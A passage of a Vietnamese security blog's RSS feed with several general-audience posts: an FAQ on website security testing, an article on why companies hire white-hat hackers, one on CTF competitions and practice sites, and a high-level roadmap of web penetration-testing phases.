<p>Nếu bạn không tiến hành kiểm tra bảo mật một cách thường xuyên, bạn đang tự đặt mình vào rủi ro. Các lỗ hổng mới liên tục được phát hiện và nếu bạn không kiểm tra chúng, thì bạn có thể là nạn nhân tiếp theo. Có rất nhiều công ty cung cấp dịch vụ kiểm tra bảo mật Website, vì vậy hãy đảm bảo chọn một công ty phù hợp với nhu cầu của bạn.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Kiểm tra bảo mật website có thực sự cần thiết không?</h3>
<p>Hoàn toàn cần thiết! Kiểm tra bảo mật giúp phát hiện và vá các lỗ hổng trước khi hacker tấn công, bảo vệ dữ liệu và danh tiếng website của bạn.  Việc này cũng giúp đáp ứng các yêu cầu tuân thủ về bảo mật.</p>
<h3>Tôi nên kiểm tra bảo mật website thường xuyên như thế nào?</h3>
<p>Tần suất kiểm tra phụ thuộc vào độ phức tạp của website và mức độ nhạy cảm của dữ liệu.  Tuy nhiên, ít nhất nên thực hiện định kỳ hàng năm, hoặc thường xuyên hơn nếu có cập nhật lớn về phần mềm hoặc tính năng.</p>
<h3>Những loại kiểm tra bảo mật website phổ biến là gì?</h3>
<p>Ba loại phổ biến gồm: Kiểm tra thâm nhập (Pentest), đánh giá mã nguồn (Code review) và quét lỗ hổng bảo mật. Mỗi loại đều có ưu điểm riêng và thường được kết hợp để đảm bảo hiệu quả tối đa.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/kinh-nghiem-khi-kiem-tra-bao-mat-website/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Tại sao các công ty lại thuê Hacker về làm việc?</title>
		<link>https://anonyviet.com/tai-sao-cac-cong-ty-lai-thue-hacker-ve-lam-viec/</link>
					<comments>https://anonyviet.com/tai-sao-cac-cong-ty-lai-thue-hacker-ve-lam-viec/#respond</comments>
		
		<dc:creator><![CDATA[Dark Sniffer]]></dc:creator>
		<pubDate>Mon, 22 Nov 2021 00:29:18 +0000</pubDate>
				<category><![CDATA[Kiến thức]]></category>
		<category><![CDATA[bảo mật]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentester]]></category>
		<category><![CDATA[thuê hacker]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=37196</guid>

					<description><![CDATA[Không phải tất cả Hacker đều là kẻ xấu. Để bảo vệ mạng đúng cách, bạn cần biết loại tấn công mà bạn sẽ phải đối mặt. Vì vậy, việc thuê Hacker sẽ giúp bạn giảm thiểu các tiềm ẩn nguy cơ về bảo mật cho hệ thống. Chính xác thì Hacker là gì? Hacker [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Không phải tất cả Hacker đều là kẻ xấu. Để bảo vệ mạng đúng cách, bạn cần biết loại tấn công mà bạn sẽ phải đối mặt. Vì vậy, việc thuê Hacker sẽ giúp bạn giảm thiểu các tiềm ẩn nguy cơ về bảo mật cho hệ thống.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/11/cyber-security-operations-center.jpg" alt="Tại sao các công ty lại thuê hacker?" width="600" height="338" title="Tại sao các công ty lại thuê Hacker về làm việc? 46"></p>
<h2>Chính xác thì Hacker là gì?</h2>
<p>Hacker là một từ đã được sử dụng lại và nghĩa gốc của nó gần như bị xóa bỏ hoàn toàn. Nó từng có nghĩa là một lập trình viên có năng khiếu, được định hướng. Hacker thực tế bị ám ảnh bởi lập trình, đến mức có thể tách biệt khỏi cuộc sống xã hội bình thường. Họ theo đuổi kiến ​​thức về cách hoạt động bên trong của máy tính, mạng và — trên hết — là phần mềm. Ngoài việc thiếu tương tác xã hội, hacker không được coi là một kẻ xấu.</p>
<p>Với sự phổ biến của CNTT, tội phạm mạng đã trở thành một vấn nạn. Những người có kỹ năng để gây ra các vụ tấn công mạng là hacker, và vì vậy thuật ngữ hacker đã trở nên có ý nghĩa như ngày nay. Nếu bạn yêu cầu ai đó giải thích hacker là gì thì họ sẽ mô tả một người có kiến ​​thức sâu rộng về máy tính, hệ điều hành và lập trình cũng như ý định truy cập vào các hệ thống máy tính.</p>
<p>Nhưng định nghĩa mới về hacker cũng chia hacker thành nhiều loại khác nhau. Có nột số người cố gắng xâm nhập hệ thống mạng là những người tốt và ngược lại. Vậy nên chúng ta có 2 loại hacker:</p>
<ul>
<li><strong>Hacker mũ đen</strong> là những kẻ xấu thực sự. Họ là những kẻ xâm nhập mạng và thực hiện các hành động phạm tội. Họ cố gắng kiếm tiền thông qua các hoạt động bất hợp pháp.</li>
<li><strong>Hacker mũ trắng </strong>thì khác, họ có quyền xâm nhập mạng. Họ được thuê để kiểm tra tính bảo mật của công ty.</li>
</ul>
<p>Tuy nhiên, trong cuộc sống, mọi thứ hiếm khi chỉ có hai màu đen và trắng.</p>
<ul>
<li><strong>Hacker mũ xám</strong> hành xử giống như một tin tặc mũ trắng, nhưng họ không xin phép trước. Họ kiểm tra tính bảo mật của công ty và báo cáo cho doanh nghiệp với hy vọng được trả tiền thưởng. Họ vi phạm pháp luật — hack hệ thống mà không được phép là bất hợp pháp, ngay cả khi công ty biết ơn và trả tiên cho bạn.</li>
<li><strong>Hacker mũ xanh</strong> là người không có kỹ năng, nhưng họ biết cách sử dung các phần mềm tấn công yêu cầu kỹ năng thấp, chẳng hạn như chương trình tấn công DDOS. Họ sử dụng nó để chống lại một doanh nghiệp. Thường là để trả thù như một nhân viên cũ bất mãn có thể sử dụng các chiến thuật như vậy.</li>
<li><strong>Hacker mũ đỏ</strong> là cảnh sát duy nhất trong thế giới hacker. Họ là những tin tặc nhắm mục tiêu vào những tin tặc mũ đen. Giống như mũ xám, mũ đỏ đang sử dụng những phương pháp bất hợp pháp. Giống như Marvel’s Punisher, họ hoạt động bên ngoài luật pháp và không chịu trừng phát, thực hiện thứ công lý mà họ cho là đúng.</li>
<li><strong>Hacker mũ xanh</strong> là một người có tham vọng trở thành một hacker. Họ là những người muốn trở thành mũ đen.</li>
</ul>
<h2>Hacker tội phạm và Hacker chuyên nghiệp</h2>
<p>Tin tặc chuyên nghiệp có thể là những tin tặc có đạo đức (White Hat) khi làm việc, sẵn sàng kiểm tra khả năng phòng thủ của bất kỳ công ty nào và thử độ bảo mật của họ. Họ có thể là những tin tặc làm việc cho các công ty bảo mật lớn hơn, thực hiện cùng một vai trò nhưng làm việc thường xuyên hơn.</p>
<p>Các tổ chức có thể trực tiếp sử dụng các tin tặc của riêng họ. Họ làm việc cùng với các đối tác của mình trong lĩnh vực hỗ trợ CNTT để liên tục thăm dò, kiểm tra và cải thiện an ninh mạng của tổ chức.</p>
<p>Đội đỏ cố gắng tấn công vào tổ chức của chính họ và đội xanh thì ngăn chặn cuộc tấn công đó. Thường thì bạn sẽ cố định ở một đội duy nhất. Nhưng các tổ chức khác thích khuấy động mọi thứ bằng cách di chuyển nhân viên giữa các đội để tấn công lẫn nhau.</p>
<p>Đôi khi các tác nhân đe dọa chuyển sang làm bảo mật chính thống. Những nhân vật trong ngành như Kevin Mitnick &#8211; từng là hacker được truy nã gắt gao nhất thế giới &#8211; điều hành các công ty tư vấn bảo mật của riêng họ.</p>
<p>Các hacker nổi tiếng khác đã được săn tuyển vào các công việc chính thống, chẳng hạn như Peiter Zatko, thành viên một thời của hack Cult of the Dead Cow. Vào tháng 11 năm 2020, ông gia nhập Twitter với tư cách là người đứng đầu bộ phận bảo mật sau các nhiệm kỳ tại Stripe, Google và Cơ quan Nghiên cứu và Dự án Quốc phòng Tiên tiến của Lầu Năm Góc.</p>
<p>Charlie Miller, được biết đến với việc vạch trần các lỗ hổng trong các sản phẩm của Apple và hack hệ thống lái và tăng tốc trên xe Jeep Cherokee, đã làm việc ở các vị trí bảo mật cấp cao tại NSA, Uber và Cruise Automation.</p>
<p>Nhưng cũng có rất nhiều trường hợp mọi người không thể kiếm được việc làm trong lĩnh vực an ninh mạng vì những sai lầm mà họ đã mắc phải trong quá khứ.</p>
<p>Một số tin tặc chuyên nghiệp làm việc cho — và được huấn luyện bởi — các cơ quan tình báo của chính phủ hoặc các đối tác quân sự. Các đội đặc nhiệm do chính phủ phê chuẩn được giao nhiệm vụ thực hiện các hoạt động thu thập thông tin tình báo, phòng thủ và tấn công mạng để đảm bảo an ninh quốc gia và chống khủng bố.</p>
<h2>Hacker khi bị bắt</h2>
<p>Tất cả các quốc gia có năng lực về mặt kỹ thuật đều có các đơn vị tình báo mạng. Họ thu thập, giải mã và phân tích các thông tin tình báo quân sự và phi quân sự về chiến lược, hoạt động và chiến thuật. Họ cung cấp phần mềm giám sát và tấn công thay mặt cho nhà nước tiến hành các nhiệm vụ gián điệp. Họ là những người trong bóng tối, nơi kẻ thù đang cố gắng làm điều tương tự với bạn. Họ muốn thâm nhập vào hệ thống của bạn giống như bạn muốn truy cập vào hệ thống của họ. Các đối tác của bạn đang phát triển các công cụ phần mềm phòng thủ và tấn công, đồng thời cố gắng phát hiện và tận dụng các cuộc tấn công zero-day, giống như bạn.</p>
<p>Shift5 là một công ty khởi nghiệp an ninh mạng được thành lập bởi hai cựu nhân viên Cơ quan An ninh Quốc gia. Họ không chỉ làm việc trong NSA mà còn làm việc trong đơn vị Tailored Access Operations. Đây là một trong những bộ phận bí mật nhất của NSA. Shift5 hứa hẹn cung cấp công nghệ giúp bảo vệ cơ sở hạ tầng quan trọng của Hoa Kỳ. Họ đã công bố một vòng tài trợ trị giá 20 triệu đô la vào tháng 10 năm 2021.</p>
<p>Lực lượng Phòng vệ Israel tương đương với NSA là Đơn vị 8200. Đơn vị 82 hay Đơn vị (Unit) là nhóm tình báo quân sự nổi tiếng của Israel. Các cựu sinh viên của Đơn vị 82, và nhóm bí mật bên trong được gọi là Đơn vị 81, đã thành lập hoặc đồng sáng lập một số công ty công nghệ thành công nhất. <a href="https://www.checkpoint.com/" target="_blank" rel="noopener">Check Point Software</a>, Palo Alto Networks và CyberArk đều có các thành viên sáng lập cũ là Unit. Đây là những công ty thành công được dẫn dắt bởi những bộ não kỹ thuật thông minh nhất.</p>
<p>Các biến chứng nảy sinh khi các cựu nhân viên tình báo Hoa Kỳ được làm việc ở nước ngoài. Hai công dân Hoa Kỳ và một cựu công dân Hoa Kỳ đã gây chú ý gần đây khi có thông tin tiết lộ rằng họ đã làm việc cho nhóm DarkMatter, được thành lập tại Các Tiểu vương quốc Ả Rập Thống nhất. DarkMatter điều hành chương trình giám sát khét tiếng Project Raven cho chính phủ các Tiểu vương quốc.</p>
<p>Vào tháng 9 năm 2021, Marc Baier, Ryan Adams, Daniel Gericke đã tham gia vào một thỏa thuận truy tố hoãn lại hạn chế các hoạt động việc làm trong tương lai và yêu cầu thanh toán chung 1,68 triệu đô la tiền phạt.</p>
<h2>Kỹ năng hấp dẫn trong thị trường còn hạn chế</h2>
<p>Các công ty thuê những cựu tin tặc có kinh nghiệm để phục vụ công ty. Nhưng nếu bạn tham gia vào các hoạt động an ninh mạng cho một cơ quan nhà nước hoặc quân đội, bạn cần hiểu các giới hạn và kiểm soát được bản thân để đảm bảo bạn cung cấp dịch vụ của mình cho các tổ chức và cho các mục đích hợp pháp.</p>
<p>Nếu bạn lo lắng mình trở thành mục tiêu của hacker thì có thể sử dụng các biện pháp<a href="https://anonyviet.com/phuong-phap-bao-mat-giup-an-toan-tren-internet/"> sau đây</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Tại sao các công ty lại thuê hacker?</h3>
<p>Các công ty thuê hacker mũ trắng (ethical hackers) để đánh giá và cải thiện khả năng bảo mật hệ thống của họ.  Những chuyên gia này có kỹ năng thâm nhập hệ thống, giúp phát hiện lỗ hổng bảo mật trước khi tin tặc mũ đen có thể lợi dụng.</p>
<h3>Có những loại hacker nào?</h3>
<p>Có nhiều loại hacker, từ hacker mũ trắng (có đạo đức) làm việc để bảo vệ hệ thống, đến hacker mũ đen (phi đạo đức) thực hiện các hoạt động tấn công bất hợp pháp.  Ngoài ra còn có hacker mũ xám (hoạt động ngoài phạm vi cho phép) và các loại khác với mục đích và phương thức hoạt động khác nhau.</p>
<h3>Liệu việc thuê hacker có an toàn không?</h3>
<p>Việc thuê các hacker mũ trắng từ các công ty bảo mật uy tín là an toàn.  Họ được đào tạo bài bản và có kinh nghiệm trong việc kiểm tra bảo mật mà không gây hại cho hệ thống.  Tuy nhiên, cần lựa chọn kỹ càng để tránh rủi ro.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/tai-sao-cac-cong-ty-lai-thue-hacker-ve-lam-viec/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Tìm hiểu về cuộc chiến giữa các Hacker</title>
		<link>https://anonyviet.com/tim-hieu-ve-cuoc-chien-giua-cac-hacker/</link>
					<comments>https://anonyviet.com/tim-hieu-ve-cuoc-chien-giua-cac-hacker/#respond</comments>
		
		<dc:creator><![CDATA[Dark Sniffer]]></dc:creator>
		<pubDate>Fri, 24 Sep 2021 06:40:15 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[an ninh mạng]]></category>
		<category><![CDATA[blue team]]></category>
		<category><![CDATA[hacker]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentester]]></category>
		<category><![CDATA[red team]]></category>
		<category><![CDATA[tấn công mạng]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=27796</guid>

					<description><![CDATA[Chắc mọi người đều biết cảnh hacker tấn công từ NCIS rồi nhỉ. Làm việc trong phòng thí nghiệm pháp y số thiếu ánh sáng, Abby Sciuto (Pauley Perrette) và Timothy McGee (Sean Murray) phải chống lại một tên tội phạm mạng, chuyên đánh cắp thông tin về cuộc điều tra của họ. Liệu bạn [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Chắc mọi người đều biết cảnh hacker tấn công từ <a href="https://www.cbs.com/shows/ncis/" target="_blank" rel="noopener">NCIS</a> rồi nhỉ. Làm việc trong phòng thí nghiệm pháp y số thiếu ánh sáng, Abby Sciuto (Pauley Perrette) và Timothy McGee (Sean Murray) phải chống lại một tên tội phạm mạng, chuyên đánh cắp thông tin về cuộc điều tra của họ.</strong></p>
<div class="jeg_video_container jeg_video_content"><iframe loading="lazy" title="NCIS 2 IDIOTS 1 KEYBOARD" width="500" height="375" src="https://www.youtube.com/embed/u8qgehH3kEQ?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></div>
<p>Liệu bạn có nghĩ các hacker ngoài đời đều &#8220;chiến đấu&#8221; với nhau bằng cách trên không? Trong bài viết này, mình sẽ giải mã cho các bạn biết nhé.</p>
<h2>Cuộc chiến của các Hacker trong thế giới thực</h2>
<p>Những cảnh phim đó là những hình ảnh miêu tả sai lầm về các cuộc tấn công trong thế giới điện ảnh. Nơi việc xâm nhập vào các hệ thống máy tính từ xa diễn ra chỉ trong chốc lát, kèm theo một loạt các dòng chữ màu xanh lá cây vô nghĩa và các cửa sổ được bật lên một cách ngẫu nhiên.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/06/154.jpg" alt="Tìm hiểu về cuộc chiến giữa các hacker" width="900" height="415" title="Tìm hiểu về cuộc chiến giữa các Hacker 48"></p>
<p>Trên thực tế các cuộc tấn công diễn ra ít kịch tính hơn rất nhiều. Hacker và những người nhà kiểm thử bảo mật (Pentester) dành thời gian để tìm hiểu hệ thống mục tiêu. Họ cố gắng tìm ra cấu trúc liên kết mạng, cũng như phần mềm và thiết bị đang được sử dụng. Sau đó, họ sẽ tìm ra cách có thể khai thác những thứ đó.</p>
<p>Quên đoạn phim trên của NCIS đi nhé. Các nhóm an ninh mạng tập trung phòng thủ bằng cách đảm bảo tất cả các hệ thống đều an toàn và hoạt động chính xác. Nếu một Hacker bằng cách nào đó có thể xâm nhâp vào hệ thống phòng thủ bên ngoài, IPS (Hệ thống ngăn chặn xâm nhập) và IDS (Hệ thống phát hiện xâm nhập) sẽ tự động can thiệp để hạn chế thiệt hại.</p>
<p>Các hệ thống trên đều tự động bởi vì rất ít cuộc tấn công nhắm vào 1 mục tiêu cụ thể. Đúng hơn, bản chất của hacker là những kẻ tìm kiếm cơ hội. Bất kỳ ai cũng có thể cấu hình máy chủ để dò tìm lỗ hổng trên mạng internet, và tổ chức các cuộc tấn công theo kịch bản có sẵn. Có rất nhiều máy chủ như vậy tồn tại trên khắp thế giới, vậy nên nếu xử lý từng vấn đề theo cách thủ công là điều hoàn toàn không thể.</p>
<p>Hầu hết sự tham gia của con người đều đến trong khoảnh khắc sau khi hệ thống phòng thủ bên ngoài bị phá vỡ. Lúc này, hõ sẽ cố gắng tìm điểm Hacker tấn công vào hệ thống và đóng nó để Hacker không thể sử dụng lại. Các nhóm ứng phó sự cố cũng sẽ cố gắng thống kê thiệt hại, cách khắc phục và liệu có bất kỳ vấn đề bảo mật nào cần được giải quyết hay không.</p>
<h2 role="heading">Capture the Flag (CTF)</h2>
<p>Tuy nhiên, các Hacker đôi khi thực hiện cuộc tấn công trong thời gian thực, thường là vì gặp tình huống khó khăn mà công cụ không tự thực hiện tấn công được nữa.</p>
<p>Mình đang nói về các cuộc thi Capture the Flag (CTF). Những điều cuộc thi này thường diễn ra tại các hội nghị infosec, như các sự kiện BSides khác nhau. Ở đó, các Hacker cạnh tranh với nhau để hoàn thành thử thách trong một khoảng thời gian nhất định. Càng chiến thắng nhiều thử thách, họ càng nhận được nhiều điểm.</p>
<p>Có hai loại cuộc thi CTF. Loại thứ nhất là Đội Đỏ, (Hacker hoặc một nhóm trong số họ) cố gắng xâm nhập thành công vào các hệ thống được chỉ định không có khả năng phòng thủ chủ động. Hình thức bảo vệ của hệ thống sẽ được ban tổ chức giới thiệu trước cuộc thi.</p>
<p>Loại cuộc thi thứ hai là giữa Đội Đỏ tấn công với Đội Xanh phòng thủ (<a href="https://anonyviet.com/red-team-va-blue-team-trong-an-ninh-mang-la-gi/">Red team, Blue Team là gì?</a>). Đội Đỏ ghi điểm bằng cách thâm nhập thành công hệ thống mục tiêu, trong khi Đội Xanh được đánh giá dựa trên mức độ hiệu quả khi làm chệch hướng các cuộc tấn công này.</p>
<p>Cũng có các thử thách khác nhau giữa sự kiện, nhưng chúng thường được thiết kế để kiểm tra các kỹ năng mà các chuyên gia bảo mật sử dụng hàng ngày như lập trình, khai thác các lỗ hổng đã biết trong hệ thống và dịch ngược.</p>
<p>Mặc dù các sự kiện CTF khá cạnh tranh. Nhưng Hacker, về bản chất, là những người ham học hỏi và cũng có xu hướng sẵn sàng chia sẻ kiến ​​thức của họ với người khác. Vì vậy, không có gì lạ khi đội đối phương hoặc khán giả chia sẻ thông tin có thể giúp ích cho đối thủ.</p>
<h2>Các cuộc thi CTF từ xa</h2>
<p>Do COVID-19, nên tất cả các hội nghị bảo mật trực tiếp năm 2020 đã bị hủy bỏ hoặc hoãn lại. Tuy nhiên, mọi người vẫn có thể tham gia sự kiện CTF trong khi tuân thủ các quy định giãn cách xã hội.</p>
<p>Các trang web như <a href="https://ctftime.org/" target="_blank" rel="noopener">CTFTime</a> sẽ tổng hợp các sự kiện CTF sắp tới. Đúng như bạn mong đợi tại một sự kiện trực tiếp, nhiều sự kiện trong số này sẽ có tính cạnh tranh rất cao. CTFTime thậm chí còn hiển thị bảng xếp hạng các đội thành công nhất.</p>
<p>Nếu bạn muốn đợi cho đến khi mọi thứ ổn định trở lại, bạn cũng có thể tham gia vào các thử thách solo hack. Trang web <a href="https://www.root-me.org/?lang=en" target="_blank" rel="noopener">Root-Me</a> đưa ra những thử thách đa dạng nhằm kiểm tra giới hạn của các hacker.</p>
<p>Một tùy chọn khác, nếu bạn không ngại tạo môi trường tấn công trên máy tính cá nhân của mình, là <a href="http://www.dvwa.co.uk/" target="_blank" rel="noopener">Damn Vulnerable Web Application (DVWA)</a>. Ứng dụng web này cố tình chứa đầy các lỗi bảo mật, cho phép các hacker có thể kiểm tra kỹ năng của họ một cách an toàn và hợp pháp.</p>
<p>Và đó là tất cả những gì bạn cần biết về cuộc chiến giữa các hacker. Ngoài ra, nếu bạn muốn cải thiện các kỹ năng hack của mình thì có thể đọc <a href="https://anonyviet.com/cac-trang-web-thuc-hanh-hack-giup-cai-thien-ky-nang-hack/">bài viết này</a>.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Hacker có thực sự &#8220;chiến đấu&#8221; với nhau như trong phim không?</h3>
<p>Không hẳn. Trong phim, các cuộc tấn công mạng thường được miêu tả rất kịch tính và nhanh chóng.  Trên thực tế, quá trình này phức tạp hơn nhiều, đòi hỏi sự tỉ mỉ và kiên nhẫn để tìm hiểu hệ thống mục tiêu trước khi tiến hành khai thác lỗ hổng.</p>
<h3>Capture the Flag (CTF) là gì?</h3>
<p>CTF là các cuộc thi lập trình an ninh mạng, nơi các hacker cạnh tranh để giải quyết các thử thách bảo mật.  Có hai loại chính: Đội Đỏ (tấn công) và Đội Xanh (phòng thủ), hoặc chỉ tập trung vào tấn công mà không có phòng thủ.</p>
<h3>Tôi có thể thực hành kỹ năng hack an toàn ở đâu?</h3>
<p>Có nhiều nguồn tài nguyên trực tuyến để bạn thực hành, bao gồm các cuộc thi CTF trực tuyến như CTFTime và Root-Me, hoặc các ứng dụng web dễ bị tổn thương như Damn Vulnerable Web Application (DVWA).</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/tim-hieu-ve-cuoc-chien-giua-cac-hacker/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Lộ trình trở thành nhà Kiểm thử thâm nhập Website &#8211; Pentest Website</title>
		<link>https://anonyviet.com/lo-trinh-tro-thanh-nha-kiem-thu-tham-nhap-website/</link>
					<comments>https://anonyviet.com/lo-trinh-tro-thanh-nha-kiem-thu-tham-nhap-website/#respond</comments>
		
		<dc:creator><![CDATA[Ellyx13]]></dc:creator>
		<pubDate>Mon, 17 May 2021 07:47:43 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[kiểm thử bảo mật]]></category>
		<category><![CDATA[Kiểm thử thâm nhập Website]]></category>
		<category><![CDATA[pentest]]></category>
		<category><![CDATA[pentester]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=27007</guid>

					<description><![CDATA[Internet ngày càng phát triển thì tội phạm mạng cũng ngày càng nhiều. Các cuộc tấn công vào trang web để đánh cắp dữ liệu ngày càng phổ biến. Lực lượng Hacker mũ trắng hay còn gọi là Pentester &#8211; nhà Kiểm thử thâm nhập Website ra đời để giúp tìm ra lỗ hổng các Website. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Internet ngày càng phát triển thì tội phạm mạng cũng ngày càng nhiều. Các cuộc tấn công vào trang web để đánh cắp dữ liệu ngày càng phổ biến. Lực lượng Hacker mũ trắng hay còn gọi là Pentester &#8211; nhà Kiểm thử thâm nhập Website ra đời để giúp tìm ra lỗ hổng các Website. Theo Gartner, hơn 123 tỷ USD đã được chi cho lĩnh vực an ninh mạng trong năm 2020. Tổng chi phí dành cho tội phạm mạng dự kiến ​​sẽ vượt ngưỡng 10,5 nghìn tỷ USD mỗi năm vào năm 2025, tăng từ 3 nghìn tỷ USD vào năm 2015.</strong></p>
<p><a href="https://anonyviet.com/wp-content/uploads/2021/05/kiem-thu-bao-mat-web.jpg"><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/05/kiem-thu-bao-mat-web.jpg" alt="Lộ trình để trở thành nhà Kiểm thử bảo mật Web" width="494" height="332" title="Lộ trình trở thành nhà Kiểm thử thâm nhập Website - Pentest Website 50"></a></p>
<p>Sự gia tăng tỷ lệ các cuộc tấn công mạng mỗi năm cũng cho thấy vào cuối năm 2021, cứ 11 giây lại có một doanh nghiệp bị tấn công.</p>
<p>Một trong những cách thích hợp nhất để bảo mật một trang web là thực hiện các kỹ thuật bảo mật toàn diện như kiểm tra thâm nhập web (web pentest). Thông qua bài viết này, mình sẽ cho bạn biết mọi thứ liên quan đến web pentester.</p>
<h2>Kiểm thử thâm nhập Website là gì?</h2>
<p>Mục đích của Kiểm thử thâm nhập Website là để xác định các rủi ro và lỗ hổng trong hệ thống. Những lỗ hổng này, nếu không được kiểm soát, có thể đe dọa tới sự bảo mật của toàn hệ thống.</p>
<p>Kiểm thử thâm nhập Website có thể được thực hiện nội bộ hoặc thuê các hacker mũ trắng để thực hiện một loạt các cuộc tấn công nhằm vào hệ thống của họ nhằm tìm ra điểm yếu trong hệ thống. Việc xác định các điểm yếu và lỗ hổng trong hệ thống thông qua hacker mũ trắng có thể giúp bạn thu thập thông tin về cách hacker tấn công hệ thống bảo mật của bạn.</p>
<p>Các dữ liệu bị lộ lọt dưới bất kỳ hình thức nào (có thể là thông tin cá nhân hoặc thông tin khách hàng) có thể khiến công ty của bạn gặp rắc rối. Đây là lý do tại sao việc kiểm thử thâm nhập web định kỳ rất quan trọng.</p>
<h2>Các hình thức kiểm thử thâm nhập</h2>
<p>Kiểm thử thâm nhập Website có thể được chia thành các loại khác nhau dựa trên cách tiếp cận của nó. Các loại kiểm thử thâm nhập khác nhau yêu cầu thông tin khác nhau để tiến hành.</p>
<p>Trên cơ sở thông tin có sẵn:</p>
<ul>
<li><strong>Black-box pentest:</strong> bạn sẽ đóng vai là Hacker mũ đen, và tìm cách tiếp cận hệ thống để khai thác từ các lỗi bạn phát hiện ra được.</li>
<li><strong>White-box pentest: </strong>Hoạt động theo hướng ngược lại của <strong>Black-box pentest</strong>, bạn được cấp quyền truy cập hoàn toàn vào mã nguồn, tài liệu&#8230; Và tìm kiếm lỗ hổng dựa trên những thông tin mà nhân viên của công ty có được. Ví dụ như quyền truy cập vào Windows, Login Website&#8230;</li>
<li><strong>Grey-box pentest: </strong>Bạn được cung cấp 1 ít thông tin về hệ thống, và từ đó sẽ tìm cách tấn công hoặc kiểm tra lỗi Website</li>
</ul>
<p>Trên cơ sở các yêu cầu của trang web. Có năm loại web pentest dựa trên các yêu cầu của trang web:</p>
<ol>
<li>Kiểm thử thâm nhập của mạng nội bộ và khai thác</li>
<li>Kiểm thử thâm nhập của mạng không dây</li>
<li>Kiểm thử Social engineering</li>
<li>Kiểm thử thâm nhập dữ liệu đám mây (Cloud)</li>
<li>Kiểm thử thâm nhập vật lý</li>
</ol>
<h2>Phương pháp Kiểm thử thâm nhập Website</h2>
<p>Quá trình kiểm thử thâm nhập web bao gồm năm giai đoạn:</p>
<h3>1. Lên kế hoạch &amp; tìm kiếm thông tin từ nguồn côn gkhai</h3>
<p>Bước đầu tiên của Kiểm thử thâm nhập Website là thu thập thông tin. Trong bước này, pentester sẽ cố gắng tìm ra các thông tin như phiên bản CMS, Hệ điều hành máy chủ,.. Giai đoạn này cũng bao gồm việc xác định phạm vi và yêu cầu của bài test.</p>
<p>Các công cụ phổ biến nhất được các Pentesters sử dụng cho giai đoạn này là Nmap, Harvester, Zenmap (phiên bản GUI của Nmap),&#8230;</p>
<h3>2. Phân tích code</h3>
<p>Sau khi xác định phạm vi, giai đoạn tiếp theo liên quan đến việc quét code. Bước này sẽ giúp bạn hiểu cách trang web sẽ phản ứng với các nỗ lực tấn công.</p>
<ul>
<li><strong>Phân tích code tĩnh:</strong> Được thực hiện để kiểm tra code nhằm xác định hành vi của code trong khi chạy ứng dụng.</li>
<li><strong>Phân tích code động:</strong> Được thực hiện để kiểm tra mã trong khi ứng dụng đang hoạt động. Điều này cung cấp một đánh giá thực tế hơn về code.</li>
</ul>
<h3>3. Giành quyền truy cập</h3>
<p>Trong giai đoạn này, Pentester sử dụng các <strong>CVE</strong> (mã lỗi lỗ hổng bảo mật đã được công bố công khai) đã biết để phát hiện các lỗ hổng tiềm ẩn của mục tiêu. Sau khi phát hiện ra lỗ hổng, Pentester sau đó sẽ khai thác lỗ hổng được tìm thấy bằng cách cố gắng đánh cắp dữ liệu, leo thang đặc quyền,&#8230;</p>
<p>Đây là <a href="https://anonyviet.com/10-cong-cu-khai-thac-lo-hong-bao-mat-hay-su-dung/" target="_blank" rel="noopener">10 công cụ khai thác lỗ hổng bảo mật</a> các chuyên gia hay sử dụng để khai thác lỗi bảo mật.</p>
<h3>4. Duy trì quyền truy cập</h3>
<p>Giai đoạn này sẽ xác minh xem liệu các lỗ hổng được tìm thấy trong bước trước có thể được sử dụng để duy trì quyền truy cập vào trang web của bạn hay không. Mục đích chính của giai đoạn này là cài backdoor, up shell vào trang web khi quá trình tấn công đã hoàn tất.</p>
<h3>5. Phân tích</h3>
<p>Giai đoạn cuối cùng của kiểm thử thâm nhập web là phân tích các kết quả được tìm thấy trong các bước trước đó và báo cáo chi tiết quá trình web pentest:</p>
<ul>
<li>Các sơ hở và lỗ hổng được tìm thấy trong quá trình thử nghiệm</li>
<li>Các mối đe dọa của lỗ hổng này có thể gây ra với hệ thống</li>
<li>Đánh giá dữ liệu nhạy cảm</li>
<li>Thời gian Pentester có thể khai thác các lỗ hổng này mà không bị phát hiện</li>
</ul>
<p>Trên đây quá trình mà các web pentester thực hiện để kiểm tra hệ thống của bạn. Tham gia<a href="https://discord.gg/wJRZGDQyWZ" target="_blank" rel="noopener"> nhóm Discord</a> để có thể trao đổi với các web pentester khác nhé.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Kiểm thử thâm nhập Website (Pentest) có thực sự cần thiết không?</h3>
<p>Hoàn toàn cần thiết!  Trong bối cảnh tội phạm mạng gia tăng, pentest giúp chủ động phát hiện và khắc phục lỗ hổng bảo mật trước khi hacker tấn công, bảo vệ dữ liệu và danh tiếng của doanh nghiệp.</p>
